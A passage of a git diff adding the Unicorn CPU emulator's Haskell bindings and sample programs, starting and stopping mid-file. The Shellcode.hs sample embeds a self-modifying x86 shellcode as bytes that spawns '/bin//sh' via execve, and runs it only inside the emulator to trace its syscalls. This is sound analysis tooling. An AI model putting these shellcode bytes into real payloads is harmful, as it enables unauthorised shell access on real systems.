HookMemWriteUnmapped hookMemInvalid () 1 0 + + -- Emulate machine code in infinite time + let codeLen = codeLength x86Code32MemWrite + start uc address (address + codeLen) Nothing Nothing + + -- Now print out some registers + emuPutStrLn ">>> Emulation done. Below is the CPU context" + + ecx <- regRead uc X86.Ecx + edx <- regRead uc X86.Edx + emuPutStrLn $ ">>> ECX = 0x" ++ showHex ecx + emuPutStrLn $ ">>> EDX = 0x" ++ showHex edx + + -- Read from memory + tmp <- memRead uc 0xaaaaaaaa 4 + emuPutStrLn $ ">>> Read 4 bytes from [0x" ++ showHex 0xaaaaaaaa ++ + "] = 0x" ++ showHexBS tmp + + tmp <- memRead uc 0xffffffaa 4 + emuPutStrLn $ ">>> Read 4 bytes from [0x" ++ showHex 0xffffffaa ++ + "] = 0x" ++ showHexBS tmp + case result of + Right _ -> return () + Left err -> putStrLn $ "Failed with error " ++ show err ++ ": " ++ + strerror err + +-- Emulate code that jump to invalid memory +testI386JumpInvalid :: IO () +testI386JumpInvalid = do + putStrLn "===================================" + putStrLn "Emulate i386 code that jumps to invalid memory" + + result <- runEmulator $ do + -- Initialize emulator in X86-32bit mode + uc <- open ArchX86 [Mode32] + + -- Map 2MB memory for this emulation + memMap uc address (2 * 1024 * 1024) [ProtAll] + + -- Write machine code to be emulated to memory + memWrite uc address x86Code32JmpInvalid + + -- Initialize machine registers + regWrite uc X86.Ecx 0x1234 + regWrite uc X86.Edx 0x7890 + + -- Tracing all basic blocks with customized callback + blockHookAdd uc hookBlock () 1 0 + + -- Tracing all instructions by having @begin > @end + codeHookAdd uc hookCode () 1 0 + + -- Emulate machine code in infinite time + let codeLen = codeLength x86Code32JmpInvalid + start uc address (address + codeLen) Nothing Nothing + + -- Now print out some registers + emuPutStrLn ">>> Emulation done. Below is the CPU context" + + ecx <- regRead uc X86.Ecx + edx <- regRead uc X86.Edx + + emuPutStrLn $ ">>> ECX = 0x" ++ showHex ecx + emuPutStrLn $ ">>> EDX = 0x" ++ showHex edx + case result of + Right _ -> return () + Left err -> putStrLn $ "Failed with error " ++ show err ++ ": " ++ + strerror err + +testI386InOut :: IO () +testI386InOut = do + putStrLn "===================================" + putStrLn "Emulate i386 code with IN/OUT instructions" + + result <- runEmulator $ do + -- Initialize emulator in X86-32bit mode + uc <- open ArchX86 [Mode32] + + -- Map 2MB memory for this emulation + memMap uc address (2 * 1024 * 1024) [ProtAll] + + -- Write machine code to be emulated to memory + memWrite uc address x86Code32InOut + + -- Initialize machine registers + regWrite uc X86.Eax 0x1234 + regWrite uc X86.Ecx 0x6789 + + -- Tracing all basic blocks with customized callback + blockHookAdd uc hookBlock () 1 0 + + -- Tracing all instructions + codeHookAdd uc hookCode () 1 0 + + -- uc IN instruction + inHookAdd uc hookIn () 1 0 + + -- uc OUT instruction + outHookAdd uc hookOut () 1 0 + + -- Emulate machine code in infinite time + let codeLen = codeLength x86Code32InOut + start uc address (address + codeLen) Nothing Nothing + + -- Now print out some registers + emuPutStrLn ">>> Emulation done. Below is the CPU context" + + eax <- regRead uc X86.Eax + ecx <- regRead uc X86.Ecx + + emuPutStrLn $ ">>> EAX = 0x" ++ showHex eax + emuPutStrLn $ ">>> ECX = 0x" ++ showHex ecx + case result of + Right _ -> return () + Left err -> putStrLn $ "Failed with error " ++ show err ++ ": " ++ + strerror err + +-- Emulate code and save/restore the CPU context +testI386ContextSave :: IO () +testI386ContextSave = do + putStrLn "===================================" + putStrLn "Save/restore CPU context in opaque blob" + + result <- runEmulator $ do + -- Initialize emulator in X86-32bit mode + uc <- open ArchX86 [Mode32] + + -- Map 8KB memory for this emulation + memMap uc address (8 * 1024) [ProtAll] + + -- Write machine code to be emulated to memory + memWrite uc address x86Code32Inc + + -- Initialize machine registers + regWrite uc X86.Eax 0x1 + + -- Emulate machine code in infinite time + emuPutStrLn ">>> Running emulation for the first time" + + let codeLen = codeLength x86Code32Inc + start uc address (address + codeLen) Nothing Nothing + + -- Now print out some registers + emuPutStrLn ">>> Emulation done. Below is the CPU context" + + eax <- regRead uc X86.Eax + + emuPutStrLn $ ">>> EAX = 0x" ++ showHex eax + + -- Allocate and save the CPU context + emuPutStrLn ">>> Saving CPU context" + + context <- contextAllocate uc + contextSave uc context + + -- Emulate machine code again + emuPutStrLn ">>> Running emulation for the second time" + + start uc address (address + codeLen) Nothing Nothing + + -- Now print out some registers + emuPutStrLn ">>> Emulation done. Below is the CPU context" + + eax <- regRead uc X86.Eax + + emuPutStrLn $ ">>> EAX = 0x" ++ showHex eax + + -- Restore CPU context + contextRestore uc context + + -- Now print out some registers + emuPutStrLn ">>> Emulation done. Below is the CPU context" + + eax <- regRead uc X86.Eax + + emuPutStrLn $ ">>> EAX = 0x" ++ showHex eax + case result of + Right _ -> return () + Left err -> putStrLn $ "Failed with error " ++ show err ++ ": " ++ + strerror err + +testX8664 :: IO () +testX8664 = do + putStrLn "Emulate x86_64 code" + + result <- runEmulator $ do + -- Initialize emualator in X86-64bit mode + uc <- open ArchX86 [Mode64] + + -- Map 2MB memory for this emulation + memMap uc address (2 * 1024 * 1024) [ProtAll] + + -- Write machine code to be emulated to memory + memWrite uc address x86Code64 + + -- Initialize machine registers + regWrite uc X86.Rsp (fromIntegral address + 0x200000) + + regWrite uc X86.Rax 0x71f3029efd49d41d + regWrite uc X86.Rbx 0xd87b45277f133ddb + regWrite uc X86.Rcx 0xab40d1ffd8afc461 + regWrite uc X86.Rdx 0x919317b4a733f01 + regWrite uc X86.Rsi 0x4c24e753a17ea358 + regWrite uc X86.Rdi 0xe509a57d2571ce96 + regWrite uc X86.R8 0xea5b108cc2b9ab1f + regWrite uc X86.R9 0x19ec097c8eb618c1 + regWrite uc X86.R10 0xec45774f00c5f682 + regWrite uc X86.R11 0xe17e9dbec8c074aa + regWrite uc X86.R12 0x80f86a8dc0f6d457 + regWrite uc X86.R13 0x48288ca5671c5492 + regWrite uc X86.R14 0x595f72f6e4017f6e + regWrite uc X86.R15 0x1efd97aea331cccc + + -- Tracing all basic blocks with customized callback + blockHookAdd uc hookBlock () 1 0 + + -- Tracing all instructions in the range [address, address+20] + codeHookAdd uc hookCode64 () address (address + 20) + + -- Tracing all memory WRITE access (with @begin > @end) + memoryHookAdd uc HookMemWrite hookMem64 () 1 0 + + -- Tracing all memory READ access (with @begin > @end) + memoryHookAdd uc HookMemRead hookMem64 () 1 0 + + -- Emulate machine code in infinite time (last param = Nothing), or + -- when finishing all the code + let codeLen = codeLength x86Code64 + start uc address (address + codeLen) Nothing Nothing + + -- Now print out some registers + emuPutStrLn ">>> Emulation done. Below is the CPU context" + + rax <- regRead uc X86.Rax + rbx <- regRead uc X86.Rbx + rcx <- regRead uc X86.Rcx + rdx <- regRead uc X86.Rdx + rsi <- regRead uc X86.Rsi + rdi <- regRead uc X86.Rdi + r8 <- regRead uc X86.R8 + r9 <- regRead uc X86.R9 + r10 <- regRead uc X86.R10 + r11 <- regRead uc X86.R11 + r12 <- regRead uc X86.R12 + r13 <- regRead uc X86.R13 + r14 <- regRead uc X86.R14 + r15 <- regRead uc X86.R15 + + emuPutStrLn $ ">>> RAX = 0x" ++ showHex rax + emuPutStrLn $ ">>> RBX = 0x" ++ showHex rbx + emuPutStrLn $ ">>> RCX = 0x" ++ showHex rcx + emuPutStrLn $ ">>> RDX = 0x" ++ showHex rdx + emuPutStrLn $ ">>> RSI = 0x" ++ showHex rsi + emuPutStrLn $ ">>> RDI = 0x" ++ showHex rdi + emuPutStrLn $ ">>> R8 = 0x" ++ showHex r8 + emuPutStrLn $ ">>> R9 = 0x" ++ showHex r9 + emuPutStrLn $ ">>> R10 = 0x" ++ showHex r10 + emuPutStrLn $ ">>> R11 = 0x" ++ showHex r11 + emuPutStrLn $ ">>> R12 = 0x" ++ showHex r12 + emuPutStrLn $ ">>> R13 = 0x" ++ showHex r13 + emuPutStrLn $ ">>> R14 = 0x" ++ showHex r14 + emuPutStrLn $ ">>> R15 = 0x" ++ showHex r15 + case result of + Right _ -> return () + Left err -> putStrLn $ "Failed with error " ++ show err ++ ": " ++ + strerror err + +testX8664Syscall :: IO () +testX8664Syscall = do + putStrLn "===================================" + putStrLn "Emulate x86_64 code with 'syscall' instruction" + + result <- runEmulator $ do + -- Initialize emulator in X86-64bit mode + uc <- open ArchX86 [Mode64] + + -- Map 2MB memory for this emulation + memMap uc address (2 * 1024 * 1024) [ProtAll] + + -- Write machine code to be emulated to memory + memWrite uc address x86Code64Syscall + + -- Hook interrupts for syscall + syscallHookAdd uc hookSyscall () 1 0 + + -- Initialize machine registers + regWrite uc X86.Rax 0x100 + + -- Emulate machine code in infinite time (last param = Nothing), or + -- when finishing all code + let codeLen = codeLength x86Code64Syscall + start uc address (address + codeLen) Nothing Nothing + + -- Now print out some registers + emuPutStrLn ">>> Emulation done. Below is the CPU context" + + rax <- regRead uc X86.Rax + emuPutStrLn $ ">>> RAX = 0x" ++ showHex rax + case result of + Right _ -> return () + Left err -> putStrLn $ "Failed with error " ++ show err ++ ": " ++ + strerror err + +testX8616 :: IO () +testX8616 = do + putStrLn "Emulate x86 16-bit code" + + result <- runEmulator $ do + -- Initialize emulator in X86-16bit mode + uc <- open ArchX86 [Mode16] + + -- Map 8KB memory for this emulation + memMap uc 0 (8 * 1024) [ProtAll] + + -- Write machine code to be emulated in memory + memWrite uc 0 x86Code16 + + -- Initialize machine registers + regWrite uc X86.Eax 7 + regWrite uc X86.Ebx 5 + regWrite uc X86.Esi 6 + + -- Emulate machine code in infinite time (last param = Nothing), or + -- when finishing all the code + let codeLen = codeLength x86Code16 + start uc 0 codeLen Nothing Nothing + + -- Now print out some registers + emuPutStrLn ">>> Emulation done. Below is the CPU context" + + -- Read from memory + tmp <- memRead uc 11 1 + emuPutStrLn $ ">>> Read 1 bytes from [0x" ++ showHex 11 ++ + "] = 0x" ++ showHexBS tmp + case result of + Right _ -> return () + Left err -> putStrLn $ "Failed with error " ++ show err ++ ": " ++ + strerror err + +main :: IO () +main = do + progName <- getProgName + args <- getArgs + case args of + ["-32"] -> do + testI386 + testI386InOut + testI386ContextSave + testI386Jump + testI386Loop + testI386InvalidMemRead + testI386InvalidMemWrite + testI386JumpInvalid + ["-64"] -> do + testX8664 + testX8664Syscall + ["-16"] -> testX8616 + -- Test memleak + ["-0"] -> testI386 + _ -> putStrLn $ "Syntax: " ++ progName ++ " <-16|-32|-64>" + diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/samples/Shellcode.hs b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/samples/Shellcode.hs new file mode 100644 index 0000000..65ad979 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/samples/Shellcode.hs @@ -0,0 +1,153 @@ +-- Sample code to trace code with Linux code with syscall + +import Unicorn +import Unicorn.Hook +import qualified Unicorn.CPU.X86 as X86 + +import Control.Monad.Trans.Class (lift) +import qualified Data.ByteString as BS +import Data.Word +import qualified Numeric as N (showHex) +import System.Environment + +-- Code to be emulated +x86Code32 :: BS.ByteString +x86Code32 = BS.pack [0xeb, 0x19, 0x31, 0xc0, 0x31, 0xdb, 0x31, 0xd2, 0x31, + 0xc9, 0xb0, 0x04, 0xb3, 0x01, 0x59, 0xb2, 0x05, 0xcd, + 0x80, 0x31, 0xc0, 0xb0, 0x01, 0x31, 0xdb, 0xcd, 0x80, + 0xe8, 0xe2, 0xff, 0xff, 0xff, 0x68, 0x65, 0x6c, 0x6c, + 0x6f] + +x86Code32Self :: BS.ByteString +x86Code32Self = BS.pack [0xeb, 0x1c, 0x5a, 0x89, 0xd6, 0x8b, 0x02, 0x66, 0x3d, + 0xca, 0x7d, 0x75, 0x06, 0x66, 0x05, 0x03, 0x03, 0x89, + 0x02, 0xfe, 0xc2, 0x3d, 0x41, 0x41, 0x41, 0x41, 0x75, + 0xe9, 0xff, 0xe6, 0xe8, 0xdf, 0xff, 0xff, 0xff, 0x31, + 0xd2, 0x6a, 0x0b, 0x58, 0x99, 0x52, 0x68, 0x2f, 0x2f, + 0x73, 0x68, 0x68, 0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3, + 0x52, 0x53, 0x89, 0xe1, 0xca, 0x7d, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41] + +-- Memory address where emulation starts +address :: Word64 +address = 0x1000000 + +-- Pretty-print integral as hex +showHex :: (Integral a, Show a) => a -> String +showHex = + flip N.showHex "" + +-- Pretty-print byte string as hex +showHexBS :: BS.ByteString -> String +showHexBS = + concatMap (flip N.showHex " ") . BS.unpack + +-- Write a string (with a newline character) to standard output in the emulator +emuPutStrLn :: String -> Emulator () +emuPutStrLn = + lift . putStrLn + +-- Calculate code length +codeLength :: Num a => BS.ByteString -> a +codeLength = + fromIntegral . BS.length + +-- Callback for tracing instructions +hookCode :: CodeHook () +hookCode uc addr size _ = do + runEmulator $ do + emuPutStrLn $ "Tracing instruction at 0x" ++ showHex addr ++ + ", instruction size = 0x" ++ (maybe "0" showHex size) + + eip <- regRead uc X86.Eip + tmp <- memRead uc addr (maybe 0 id size) + + emuPutStrLn $ "*** EIP = " ++ showHex eip ++ " ***: " ++ showHexBS tmp + return () + +-- Callback for handling interrupts +-- ref: http://syscalls.kernelgrok.com +hookIntr :: InterruptHook () +hookIntr uc intno _ + | intno == 0x80 = do + runEmulator $ do + eax <- regRead uc X86.Eax + eip <- regRead uc X86.Eip + + case eax of + -- sys_exit + 1 -> do + emuPutStrLn $ ">>> 0x" ++ showHex eip ++ + ": interrupt 0x" ++ showHex intno ++ + ", SYS_EXIT. quit!\n" + stop uc + -- sys_write + 4 -> do + -- ECX = buffer address + ecx <- regRead uc X86.Ecx + + -- EDX = buffer size + edx <- regRead uc X86.Edx + + -- Read the buffer in + buffer <- memRead uc (fromIntegral ecx) (fromIntegral edx) + err <- errno uc + if err == ErrOk then + emuPutStrLn $ ">>> 0x" ++ showHex eip ++ + ": interrupt 0x" ++ showHex intno ++ + ", SYS_WRITE. buffer = 0x" ++ + showHex ecx ++ ", size = " ++ + show edx ++ ", content = " ++ + showHexBS buffer + else + emuPutStrLn $ ">>> 0x" ++ showHex eip ++ + ": interrupt 0x" ++ showHex intno ++ + ", SYS_WRITE. buffer = 0x" ++ + showHex ecx ++ ", size = " ++ show edx ++ + " (cannot get content)" + _ -> emuPutStrLn $ ">>> 0x" ++ showHex eip ++ + ": interrupt 0x" ++ showHex intno ++ + ", EAX = 0x" ++ showHex eax + return () + | otherwise = return () + +testI386 :: IO () +testI386 = do + result <- runEmulator $ do + emuPutStrLn "Emulate i386 code" + + -- Initialize emulator in X86-32bit mode + uc <- open ArchX86 [Mode32] + + -- Map 2MB memory for this emulation + memMap uc address (2 * 1024 * 1024) [ProtAll] + + -- Write machine code to be emulated to memory + memWrite uc address x86Code32Self + + -- Initialize machine registers + regWrite uc X86.Esp (fromIntegral address + 0x200000) + + -- Tracing all instructions by having @begin > @end + codeHookAdd uc hookCode () 1 0 + + -- Handle interrupt ourself + interruptHookAdd uc hookIntr () 1 0 + + emuPutStrLn "\n>>> Start tracing this Linux code" + + -- Emulate machine code in infinite time + let codeLen = codeLength x86Code32Self + start uc address (address + codeLen) Nothing Nothing + case result of + Right _ -> putStrLn "\n>>> Emulation done." + Left err -> putStrLn $ "Failed with error " ++ show err ++ ": " ++ + strerror err + +main :: IO () +main = do + progName <- getProgName + args <- getArgs + case args of + ["-32"] -> testI386 + _ -> putStrLn $ "Syntax: " ++ progName ++ " <-32|-64>" diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn.hs b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn.hs new file mode 100644 index 0000000..7ea638e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn.hs @@ -0,0 +1,360 @@ +{-| +Module : Unicorn +Description : The Unicorn CPU emulator. +Copyright : (c) Adrian Herrera, 2016 +License : GPL-2 + +Unicorn is a lightweight, multi-platform, multi-architecture CPU emulator +framework based on QEMU. + +Further information is available at . +-} +module Unicorn + ( -- * Emulator control + Emulator + , Engine + , Architecture(..) + , Mode(..) + , QueryType(..) + , runEmulator + , open + , query + , start + , stop + + -- * Register operations + , regWrite + , regRead + , regWriteBatch + , regReadBatch + + -- * Memory operations + , MemoryPermission(..) + , MemoryRegion(..) + , memWrite + , memRead + , memMap + , memUnmap + , memProtect + , memRegions + + -- * Context operations + , Context + , contextAllocate + , contextSave + , contextRestore + + -- * Error handling + , Error(..) + , errno + , strerror + + -- * Misc. + , version + ) where + +import Control.Monad (join, liftM) +import Control.Monad.Trans.Class (lift) +import Control.Monad.Trans.Except (throwE, runExceptT) +import Data.ByteString (ByteString, pack) +import Foreign +import Prelude hiding (until) + +import Unicorn.Internal.Core +import Unicorn.Internal.Unicorn + +------------------------------------------------------------------------------- +-- Emulator control +------------------------------------------------------------------------------- + +-- | Run the Unicorn emulator and return a result on success, or an 'Error' on +-- failure. +runEmulator :: Emulator a -- ^ The emulation code to execute + -> IO (Either Error a) -- ^ A result on success, or an 'Error' on + -- failure +runEmulator = + runExceptT + +-- | Create a new instance of the Unicorn engine. +open :: Architecture -- ^ CPU architecture + -> [Mode] -- ^ CPU hardware mode + -> Emulator Engine -- ^ A 'Unicorn' engine on success, or an 'Error' on + -- failure +open arch mode = do + (err, ucPtr) <- lift $ ucOpen arch mode + if err == ErrOk then + -- Return a pointer to the Unicorn engine if ucOpen completed + -- successfully + lift $ mkEngine ucPtr + else + -- Otherwise return the error + throwE err + +-- | Query internal status of the Unicorn engine. +query :: Engine -- ^ 'Unicorn' engine handle + -> QueryType -- ^ Query type + -> Emulator Int -- ^ The result of the query +query uc queryType = do + (err, result) <- lift $ ucQuery uc queryType + if err == ErrOk then + pure result + else + throwE err + +-- | Emulate machine code for a specific duration of time. +start :: Engine -- ^ 'Unicorn' engine handle + -> Word64 -- ^ Address where emulation starts + -> Word64 -- ^ Address where emulation stops (i.e. when this + -- address is hit) + -> Maybe Int -- ^ Optional duration to emulate code (in + -- microseconds). + -- If 'Nothing' is provided, continue to emulate + -- until the code is finished + -> Maybe Int -- ^ Optional number of instructions to emulate. If + -- 'Nothing' is provided, emulate all the code + -- available, until the code is finished + -> Emulator () -- ^ An 'Error' on failure +start uc begin until timeout count = do + err <- lift $ ucEmuStart uc begin until (maybeZ timeout) (maybeZ count) + if err == ErrOk then + pure () + else + throwE err + where maybeZ = maybe 0 id + +-- | Stop emulation (which was started by 'start'). +-- This is typically called from callback functions registered by tracing APIs. +-- +-- NOTE: For now, this will stop execution only after the current block. +stop :: Engine -- ^ 'Unicorn' engine handle + -> Emulator () -- ^ An 'Error' on failure +stop uc = do + err <- lift $ ucEmuStop uc + if err == ErrOk then + pure () + else + throwE err + +------------------------------------------------------------------------------- +-- Register operations +------------------------------------------------------------------------------- + +-- | Write to register. +regWrite :: Reg r + => Engine -- ^ 'Unicorn' engine handle + -> r -- ^ Register to write to + -> Int64 -- ^ Value to write to register + -> Emulator () -- ^ An 'Error' on failure +regWrite uc reg value = do + err <- lift $ ucRegWrite uc reg value + if err == ErrOk then + pure () + else + throwE err + +-- | Read register value. +regRead :: Reg r + => Engine -- ^ 'Unicorn' engine handle + -> r -- ^ Register to read from + -> Emulator Int64 -- ^ The value read from the register on success, + -- or an 'Error' on failure +regRead uc reg = do + (err, val) <- lift $ ucRegRead uc reg + if err == ErrOk then + pure val + else + throwE err + +-- | Write multiple register values. +regWriteBatch :: Reg r + => Engine -- ^ 'Unicorn' engine handle + -> [r] -- ^ List of registers to write to + -> [Int64] -- ^ List of values to write to the registers + -> Emulator () -- ^ An 'Error' on failure +regWriteBatch uc regs vals = do + err <- lift $ ucRegWriteBatch uc regs vals (length regs) + if err == ErrOk then + pure () + else + throwE err + +-- | Read multiple register values. +regReadBatch :: Reg r + => Engine -- ^ 'Unicorn' engine handle + -> [r] -- ^ List of registers to read from + -> Emulator [Int64] -- ^ A list of register values on success, + -- or an 'Error' on failure +regReadBatch uc regs = do + -- Allocate an array of the given size + let size = length regs + join . lift . allocaArray size $ \array -> do + err <- ucRegReadBatch uc regs array size + if err == ErrOk then + -- If ucRegReadBatch completed successfully, pack the contents of + -- the array into a list and return it + liftM pure (peekArray size array) + else + -- Otherwise return the error + return $ throwE err + +------------------------------------------------------------------------------- +-- Memory operations +------------------------------------------------------------------------------- + +-- | Write to memory. +memWrite :: Engine -- ^ 'Unicorn' engine handle + -> Word64 -- ^ Starting memory address of bytes to write + -> ByteString -- ^ The data to write + -> Emulator () -- ^ An 'Error' on failure +memWrite uc address bytes = do + err <- lift $ ucMemWrite uc address bytes + if err == ErrOk then + pure () + else + throwE err + +-- | Read memory contents. +memRead :: Engine -- ^ 'Unicorn' engine handle + -> Word64 -- ^ Starting memory address to read + -- from + -> Int -- ^ Size of memory to read (in bytes) + -> Emulator ByteString -- ^ The memory contents on success, or + -- an 'Error' on failure +memRead uc address size = do + -- Allocate an array of the given size + join . lift . allocaArray size $ \array -> do + err <- ucMemRead uc address array size + if err == ErrOk then + -- If ucMemRead completed successfully, pack the contents of the + -- array into a ByteString and return it + liftM (pure . pack) (peekArray size array) + else + -- Otherwise return the error + return $ throwE err + +-- | Map a range of memory. +memMap :: Engine -- ^ 'Unicorn' engine handle + -> Word64 -- ^ Start address of the new memory region to + -- be mapped in. This address must be + -- aligned to 4KB, or this will return with + -- 'ErrArg' error + -> Int -- ^ Size of the new memory region to be mapped + -- in. This size must be a multiple of 4KB, or + -- this will return with an 'ErrArg' error + -> [MemoryPermission] -- ^ Permissions for the newly mapped region + -> Emulator () -- ^ An 'Error' on failure +memMap uc address size perms = do + err <- lift $ ucMemMap uc address size perms + if err == ErrOk then + pure () + else + throwE err + +-- | Unmap a range of memory. +memUnmap :: Engine -- ^ 'Unicorn' engine handle + -> Word64 -- ^ Start addres of the memory region to be unmapped. + -- This address must be aligned to 4KB or this will + -- return with an 'ErrArg' error + -> Int -- ^ Size of the memory region to be modified. This + -- must be a multiple of 4KB, or this will return with + -- an 'ErrArg' error + -> Emulator () -- ^ An 'Error' on failure +memUnmap uc address size = do + err <- lift $ ucMemUnmap uc address size + if err == ErrOk then + pure () + else + throwE err + +-- | Change permissions on a range of memory. +memProtect :: Engine -- ^ 'Unicorn' engine handle + -> Word64 -- ^ Start address of the memory region to + -- modify. This address must be aligned to + -- 4KB, or this will return with an + -- 'ErrArg' error + -> Int -- ^ Size of the memory region to be + -- modified. This size must be a multiple + -- of 4KB, or this will return with an + -- 'ErrArg' error + -> [MemoryPermission] -- ^ New permissions for the mapped region + -> Emulator () -- ^ An 'Error' on failure +memProtect uc address size perms = do + err <- lift $ ucMemProtect uc address size perms + if err == ErrOk then + pure () + else + throwE err + +-- | Retrieve all memory regions mapped by 'memMap'. +memRegions :: Engine -- ^ 'Unicorn' engine handle + -> Emulator [MemoryRegion] -- ^ A list of memory regions +memRegions uc = do + (err, regionPtr, count) <- lift $ ucMemRegions uc + if err == ErrOk then do + regions <- lift $ peekArray count regionPtr + pure regions + else + throwE err + +------------------------------------------------------------------------------- +-- Context operations +------------------------------------------------------------------------------- + +-- | Allocate a region that can be used to perform quick save/rollback of the +-- CPU context, which includes registers and some internal metadata. Contexts +-- may not be shared across engine instances with differing architectures or +-- modes. +contextAllocate :: Engine -- ^ 'Unicon' engine handle + -> Emulator Context -- ^ A CPU context +contextAllocate uc = do + (err, contextPtr) <- lift $ ucContextAlloc uc + if err == ErrOk then + -- Return a CPU context if ucContextAlloc completed successfully + lift $ mkContext contextPtr + else + throwE err + +-- | Save a copy of the internal CPU context. +contextSave :: Engine -- ^ 'Unicorn' engine handle + -> Context -- ^ A CPU context + -> Emulator () -- ^ An error on failure +contextSave uc context = do + err <- lift $ ucContextSave uc context + if err == ErrOk then + pure () + else + throwE err + +-- | Restore the current CPU context from a saved copy. +contextRestore :: Engine -- ^ 'Unicorn' engine handle + -> Context -- ^ A CPU context + -> Emulator () -- ^ An error on failure +contextRestore uc context = do + err <- lift $ ucContextRestore uc context + if err == ErrOk then + pure () + else + throwE err + +------------------------------------------------------------------------------- +-- Misc. +------------------------------------------------------------------------------- + +-- | Combined API version & major and minor version numbers. Returns a +-- hexadecimal number as (major << 8 | minor), which encodes both major and +-- minor versions. +version :: Int +version = + ucVersion nullPtr nullPtr + +-- | Report the 'Error' of the last failed API call. +errno :: Engine -- ^ 'Unicorn' engine handle + -> Emulator Error -- ^ The last 'Error' code +errno = + lift . ucErrno + +-- | Return a string describing the given 'Error'. +strerror :: Error -- ^ The 'Error' code + -> String -- ^ Description of the error code +strerror = + ucStrerror diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn/CPU/Arm.chs b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn/CPU/Arm.chs new file mode 100644 index 0000000..138bf17 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn/CPU/Arm.chs @@ -0,0 +1,32 @@ +{-# LANGUAGE ForeignFunctionInterface #-} + +{-| +Module : Unicorn.CPU.Arm +Description : Definitions for the ARM architecture. +Copyright : (c) Adrian Herrera, 2016 +License : GPL-2 + +Definitions for the ARM architecture. +-} +module Unicorn.CPU.Arm + ( + Register(..) + ) where + +import Unicorn.Internal.Core (Reg) + +{# context lib = "unicorn" #} + +#include + +-- | ARM registers. +{# enum uc_arm_reg as Register + { underscoreToCase } + omit ( UC_ARM_REG_INVALID + , UC_ARM_REG_ENDING + ) + with prefix = "UC_ARM_REG_" + deriving (Show, Eq, Bounded) +#} + +instance Reg Register diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn/CPU/Arm64.chs b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn/CPU/Arm64.chs new file mode 100644 index 0000000..f4f1dec --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn/CPU/Arm64.chs @@ -0,0 +1,32 @@ +{-# LANGUAGE ForeignFunctionInterface #-} + +{-| +Module : Unicorn.CPU.Arm64 +Description : Definitions for the ARM64 (ARMv8) architecture. +Copyright : (c) Adrian Herrera, 2016 +License : GPL-2 + +Definitions for the ARM64 (ARMv8) architecture. +-} +module Unicorn.CPU.Arm64 + ( + Register(..) + ) where + +import Unicorn.Internal.Core (Reg) + +{# context lib = "unicorn" #} + +#include + +-- | ARM64 registers. +{# enum uc_arm64_reg as Register + { underscoreToCase } + omit ( UC_ARM64_REG_INVALID + , UC_ARM64_REG_ENDING + ) + with prefix = "UC_ARM64_REG_" + deriving (Show, Eq, Bounded) +#} + +instance Reg Register diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn/CPU/M68k.chs b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn/CPU/M68k.chs new file mode 100644 index 0000000..b06ffb3 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn/CPU/M68k.chs @@ -0,0 +1,32 @@ +{-# LANGUAGE ForeignFunctionInterface #-} + +{-| +Module : Unicorn.CPU.Mk68k +Description : Definitions for the MK68K architecture. +Copyright : (c) Adrian Herrera, 2016 +License : GPL-2 + +Definitions for the MK68K architecture. +-} +module Unicorn.CPU.M68k + ( + Register(..) + ) where + +import Unicorn.Internal.Core (Reg) + +{# context lib = "unicorn" #} + +#include + +-- | M68K registers. +{# enum uc_m68k_reg as Register + { underscoreToCase } + omit ( UC_M68K_REG_INVALID + , UC_M68K_REG_ENDING + ) + with prefix = "UC_M68K_REG_" + deriving (Show, Eq, Bounded) +#} + +instance Reg Register diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn/CPU/Mips.chs b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn/CPU/Mips.chs new file mode 100644 index 0000000..8ec5db4 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn/CPU/Mips.chs @@ -0,0 +1,65 @@ +{-# LANGUAGE ForeignFunctionInterface #-} + +{-| +Module : Unicorn.CPU.Mips +Description : Definitions for the MIPS architecture. +Copyright : (c) Adrian Herrera, 2016 +License : GPL-2 + +Definitions for the MIPS architecture. +-} +module Unicorn.CPU.Mips + ( + Register(..) + ) where + +import Unicorn.Internal.Core (Reg) + +{# context lib = "unicorn" #} + +#include + +-- | MIPS registers. +{# enum UC_MIPS_REG as Register + { underscoreToCase + , UC_MIPS_REG_0 as Reg0g + , UC_MIPS_REG_1 as Reg1g + , UC_MIPS_REG_2 as Reg2g + , UC_MIPS_REG_3 as Reg3g + , UC_MIPS_REG_4 as Reg4g + , UC_MIPS_REG_5 as Reg5g + , UC_MIPS_REG_6 as Reg6g + , UC_MIPS_REG_7 as Reg7g + , UC_MIPS_REG_8 as Reg8g + , UC_MIPS_REG_9 as Reg9g + , UC_MIPS_REG_10 as Reg10g + , UC_MIPS_REG_11 as Reg11g + , UC_MIPS_REG_12 as Reg12g + , UC_MIPS_REG_13 as Reg13g + , UC_MIPS_REG_14 as Reg14g + , UC_MIPS_REG_15 as Reg15g + , UC_MIPS_REG_16 as Reg16g + , UC_MIPS_REG_17 as Reg17g + , UC_MIPS_REG_18 as Reg18g + , UC_MIPS_REG_19 as Reg19g + , UC_MIPS_REG_20 as Reg20g + , UC_MIPS_REG_21 as Reg21g + , UC_MIPS_REG_22 as Reg22g + , UC_MIPS_REG_23 as Reg23g + , UC_MIPS_REG_24 as Reg24g + , UC_MIPS_REG_25 as Reg25g + , UC_MIPS_REG_26 as Reg26g + , UC_MIPS_REG_27 as Reg27g + , UC_MIPS_REG_28 as Reg28g + , UC_MIPS_REG_29 as Reg29g + , 